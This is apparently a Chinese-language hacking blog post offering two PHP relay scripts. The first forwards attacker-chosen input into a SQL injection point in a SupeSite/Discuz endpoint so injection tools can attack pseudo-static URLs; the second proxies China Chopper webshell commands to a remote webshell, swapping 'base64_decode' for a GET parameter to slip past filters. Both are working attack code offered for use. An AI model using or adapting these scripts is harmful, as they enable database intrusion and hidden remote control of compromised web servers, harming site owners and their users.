PHP中转访问脚本一枚

<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 

$url = "http://blog.discuz.com/batch.common.php?action=modelquote&cid=1&name=spacecomments%20where%201=$id%23"; //supsite 注入页面

echo $url;

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

将这个文件保存成inj.php即可，这个文件url如下：

    http://localhost/inj/inj.php

    把需要访问的$id根据目标页的伪静态规则放到指定的位置就可以了。如上。

    原理就是通过curl来取得目标页的内容（与直接访问目标页效果一样），只需要修改$url的内容就可以适应各种伪静态规则了。

    脚本比较简陋，有需要的童鞋，可根据情况加入post方式，代理，referer等功能。

    我们现在访问 http://localhost/inj/inj.php?id=1，

    即相当于访问 http://localhost/inj/index.php/index/index/id/1.html ，

    呵呵，现在我们就可以通过访问 http://localhost/inj/inj.php?id=1 这个连接访问ado服务器的相关页面了。顺便淘到了一个POST的中转的

<?php 
$webshell="http://www.phpinfo.me/plus/helen.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode"; 

$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); //接收菜刀的post，并把base64_decode替换成$_GET[1141056911]( 

//print_r($data); 

$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => 'POST',   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
"Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
   
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post   
echo $html;   


?>